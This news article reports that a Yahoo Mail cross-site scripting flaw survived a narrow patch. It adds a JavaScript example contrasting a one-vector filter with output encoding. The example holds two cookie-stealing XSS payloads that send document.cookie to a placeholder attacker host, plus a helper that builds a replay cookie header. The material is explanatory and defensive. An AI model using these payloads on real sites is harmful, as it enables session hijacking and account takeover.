Yahoo Mail Still Contains The XSS Vulnerability

It was recently revealed that Yahoo Mail contained a critical cross-site scripting (XSS) vulnerability: an attacker sends the victim a luring link, and when the victim clicks it, script runs in the victim's browser and sends the attacker enough of the victim's session data, the account cookies, to take over the account. Yahoo said it had since patched the vulnerability, but that claim has now proved wrong.



The fresh proof-of-concept attack on Yahoo Mail comes from Offensive Security, a security research firm. The firm says Yahoo addressed only the specific method used to exploit the XSS vulnerability; by switching to a different cross-site scripting vector, an attacker can still gain access to a victim's account.

According to Jim O’Gorman of Offensive Security, “In this case, Yahoo has been provided the proof-of-concept by Shahin. They thought they had it corrected and went around releasing statements to that fact. However, and this is actually common, they corrected the specific method of exploitation that was used in the initial proof-of-concept, but did not correct the underlying flaw. Because of this, it’s possible to bypass Yahoo’s new protections with only some slight modifications.”

To substantiate its claim, the firm has released a demo video showing how an attacker gains access to a victim's Yahoo Mail account. The attacker sends the victim a malicious link; when the victim clicks it, Yahoo's home page opens and nothing visible suggests that anything has happened.

What actually happens is that the click triggers script that collects the victim's session cookies and sends them to the attacker. The attacker adjusts them, adds them to his own browser's cookies, and can then open the victim's account directly. The video below makes clear that Yahoo still has work to do before the security of its Mail accounts can be called fool-proof.
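The pattern O'Gorman describes, a fix that blocks the one vector from the proof-of-concept while leaving the underlying flaw in place, and the cookie-theft flow just described, are easy to see side by side in code. The following is an added example written for this article; it is not Yahoo's code and not Offensive Security's proof-of-concept, whose actual vectors are not described on this page. The sanitizer, the page template, the two payloads and the attacker.example host are all constructed for illustration.

```javascript
// Added illustration for this article, not Yahoo's code and not Offensive Security's
// proof-of-concept: a narrow "patch" that only blocks the payload from the original
// PoC, versus a fix for the underlying flaw (unencoded untrusted data written into HTML).
// All names, URLs and payloads below are constructed for the example.

// Hypothetical narrow fix: strips only <script> elements, the vector the PoC is
// assumed to have used. The reflection of untrusted input into the page is untouched.
function blockSpecificPayload(input) {
  return input.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, "");
}

// Fix for the underlying flaw: HTML-entity encode untrusted data for the text
// context it is written into, so no input can open or close a tag or attribute.
function htmlEncode(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return input.replace(/[&<>"']/g, (ch) => map[ch]);
}

// The vulnerable server-side behaviour: an untrusted parameter is written straight
// into the response body after whatever "sanitizer" is in use.
function renderPage(untrusted, sanitize) {
  return `<html><body><p>Hello, ${sanitize(untrusted)}</p></body></html>`;
}

// Coarse check used only by this example: does the rendered HTML still carry a
// script element, an inline event handler, or a javascript: URL?
function containsActiveContent(html) {
  return (
    /<script\b/i.test(html) ||
    /<[a-z][^>]*\son[a-z]+\s*=/i.test(html) ||
    /javascript:/i.test(html)
  );
}

// Constructed payloads. Both send document.cookie to an attacker-controlled host
// (a placeholder domain); the second is the "slight modification" that reaches the
// same outcome without a <script> tag.
const ATTACKER = "http://attacker.example/collect";
const originalPoc =
  `<script>new Image().src="${ATTACKER}?c="+encodeURIComponent(document.cookie)</script>`;
const slightModification =
  `<img src=x onerror="new Image().src='${ATTACKER}?c='+encodeURIComponent(document.cookie)">`;

// For a given sanitizer, reports whether each payload is neutralised.
function evaluateFix(sanitize) {
  return {
    originalPocBlocked: !containsActiveContent(renderPage(originalPoc, sanitize)),
    variantBlocked: !containsActiveContent(renderPage(slightModification, sanitize)),
  };
}

// Attacker side of the session-hijack step: the exfiltration request carries the
// cookies, which the attacker turns into a Cookie header to replay from his own
// browser (or from a plain HTTP client).
function cookieHeaderFromExfil(requestUrl) {
  const stolen = new URL(requestUrl).searchParams.get("c") || "";
  // document.cookie already has the form "name=value; name2=value2"
  return stolen.split(/;\s*/).filter(Boolean).join("; ");
}

function main() {
  console.log("narrow patch:", evaluateFix(blockSpecificPayload));
  console.log("output encoding:", evaluateFix(htmlEncode));
  // Constructed sample of what the attacker's collector would receive.
  const exfil = `${ATTACKER}?c=${encodeURIComponent("Y=sess123; T=tok456")}`;
  console.log("replay header:", cookieHeaderFromExfil(exfil));
}
main();
```

With the narrow patch, the original payload is stripped but the `onerror` variant survives untouched, which is exactly the "slight modification" bypass; with contextual output encoding, neither payload can form a tag or handler at all. Marking session cookies `HttpOnly` would keep `document.cookie` from exposing them to the injected script, but that limits the damage of this particular payload rather than removing the XSS flaw itself.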

Source: Offensive Security

Courtesy: All Things D


Salman

Salman Latif is a software engineer with a specific interest in social media, big data and real-world solutions using the two. Other than that, he is a bit of a gypsy. He also writes in his own blog. You can find him on Google+ and Twitter.
